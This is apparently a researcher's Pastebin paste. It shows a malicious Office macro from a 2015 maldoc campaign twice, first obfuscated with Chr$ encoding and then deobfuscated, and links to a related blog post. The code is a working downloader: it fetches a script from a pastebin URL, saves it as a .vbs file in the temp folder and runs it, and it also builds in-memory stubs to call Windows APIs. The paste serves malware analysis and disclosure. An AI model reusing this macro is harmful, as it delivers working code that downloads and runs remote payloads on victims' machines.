Advertisement
bartblaze

Extracted + deobfuscated macro

May 8th, 2015
1,156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  6. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  7. On Error Resume Next
  8.     Dim UpICsYhhglV                As Long
  9.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  10.     Dim wZdrB                   As Long
  11.     Dim kQJlHFiPhSQwQic                As Long
  12.    
  13.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  14.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  15.    
  16.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  17.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  18.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  19.     For wZdrB = UBound(Params) To 0 Step -1
  20.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  21.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  22.     Next
  23.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  24.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  25.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  26.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  27.    
  28. End Function
  29.  
  30. Sub hfyuBJKfdgfdgsdfg()
  31. ouIYHiogeffjgyuFUFYdsg = Chr$(104) & Chr$(116) & Chr$(116) & Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) & Chr$(112) & Chr$(97) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(98) & Chr$(105) & Chr$(110) & Chr$(46) & Chr$(99) & Chr$(111) & Chr$(109) & Chr$(47) & Chr$(100) & Chr$(111) & Chr$(119) & Chr$(110) & Chr$(108) & Chr$(111) & Chr$(97) & Chr$(100) & Chr$(46) & Chr$(112) & Chr$(104) & Chr$(112) & Chr$(63) & Chr$(105) & Chr$(61) & Chr$(86) & Chr$(84) & Chr$(100) & Chr$(57) & Chr$(72) & Chr$(86) & Chr$(107) & Chr$(122)
  32. Set ertertFFFg = CreateObject(Chr$(77) & Chr$(83) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(50) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  33. Call ertertFFFg.Open(Chr$(71) & Chr$(69) & Chr$(84), ouIYHiogeffjgyuFUFYdsg, False)
  34. ertertFFFg.Send
  35. Set iyuiyui = CreateObject(Chr$(83) & Chr$(99) & Chr$(114) & Chr$(105) & Chr$(112) & Chr$(116) & Chr$(105) & Chr$(110) & Chr$(103) & Chr$(46) & Chr$(70) & Chr$(105) & Chr$(108) & Chr$(101) & Chr$(83) & Chr$(121) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(109) & Chr$(79) & Chr$(98) & Chr$(106) & Chr$(101) & Chr$(99) & Chr$(116))
  36.    ewwfgfdg = Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  37. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  38. riitiyiFF.Write ertertFFFg.ResponseText
  39. riitiyiFF.Close
  40. Set oUIYYytgsdvfFF = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
  41. oUIYYytgsdvfFF.Open Environ(Chr$(84) & Chr$(69) & Chr$(77) & Chr$(80)) & Chr$(92) & Chr$(74) & Chr$(71) & Chr$(117) & Chr$(105) & Chr$(103) & Chr$(98) & Chr$(106) & Chr$(98) & Chr$(102) & Chr$(102) & Chr$(51) & Chr$(102) & Chr$(46) & Chr$(118) & Chr$(98) & Chr$(115)
  42. End Sub
  43.  
  44. =========================================================================================================
  45.  
  46.  
  47.  
  48. <== deobfuscated: ===>
  49. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  50. On Error Resume Next
  51.     Dim UpICsYhhglV                As Long
  52.     Dim VAMMdgjbzOHrZ(&HEC00& - 1)  As Byte
  53.     Dim wZdrB                   As Long
  54.     Dim kQJlHFiPhSQwQic                As Long
  55.  
  56.     kQJlHFiPhSQwQic = GetProcAddress(LoadLibraryA(sLib), sMod)
  57.     If kQJlHFiPhSQwQic = 0 Then Exit Function
  58.  
  59.     UpICsYhhglV = VarPtr(VAMMdgjbzOHrZ(0))
  60.     RtlMoveMemory ByVal UpICsYhhglV, &H59595958, &H4:              UpICsYhhglV = UpICsYhhglV + 4
  61.     RtlMoveMemory ByVal UpICsYhhglV, &H5059, &H2:                  UpICsYhhglV = UpICsYhhglV + 2
  62.     For wZdrB = UBound(Params) To 0 Step -1
  63.         RtlMoveMemory ByVal UpICsYhhglV, &H68, &H1:                UpICsYhhglV = UpICsYhhglV + 1
  64.         RtlMoveMemory ByVal UpICsYhhglV, CLng(Params(wZdrB)), &H4:     UpICsYhhglV = UpICsYhhglV + 4
  65.     Next
  66.     RtlMoveMemory ByVal UpICsYhhglV, &HE8, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  67.     RtlMoveMemory ByVal UpICsYhhglV, kQJlHFiPhSQwQic - UpICsYhhglV - 4, &H4:         UpICsYhhglV = UpICsYhhglV + 4
  68.     RtlMoveMemory ByVal UpICsYhhglV, &HC3, &H1:                    UpICsYhhglV = UpICsYhhglV + 1
  69.     CallApiByName = CallWindowProcA(VarPtr(VAMMdgjbzOHrZ(0)), 0, 0, 0, 0)
  70.  
  71. End Function
  72.  
  73. Sub hfyuBJKfdgfdgsdfg()
  74. ouIYHiogeffjgyuFUFYdsg = http://pastebin.com/download.php?i=VTd9HVkz
  75. Set ertertFFFg = CreateObject(MSXML2.XMLHTTP)
  76. Call ertertFFFg.Open(GET, ouIYHiogeffjgyuFUFYdsg, False)
  77. ertertFFFg.Send
  78. Set iyuiyui = CreateObject(Scripting.FileSystemObject)
  79.    ewwfgfdg = Environ(TEMP)\JGuigbjbff3f.vbs
  80. Set riitiyiFF = iyuiyui.CreateTextFile(ewwfgfdg, 2)
  81. riitiyiFF.Write ertertFFFg.ResponseText
  82. riitiyiFF.Close
  83. Set oUIYYytgsdvfFF = CreateObject(Shell.Application)
  84. oUIYYytgsdvfFF.Open Environ(TEMP)\JGuigbjbff3f.vbs
  85. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement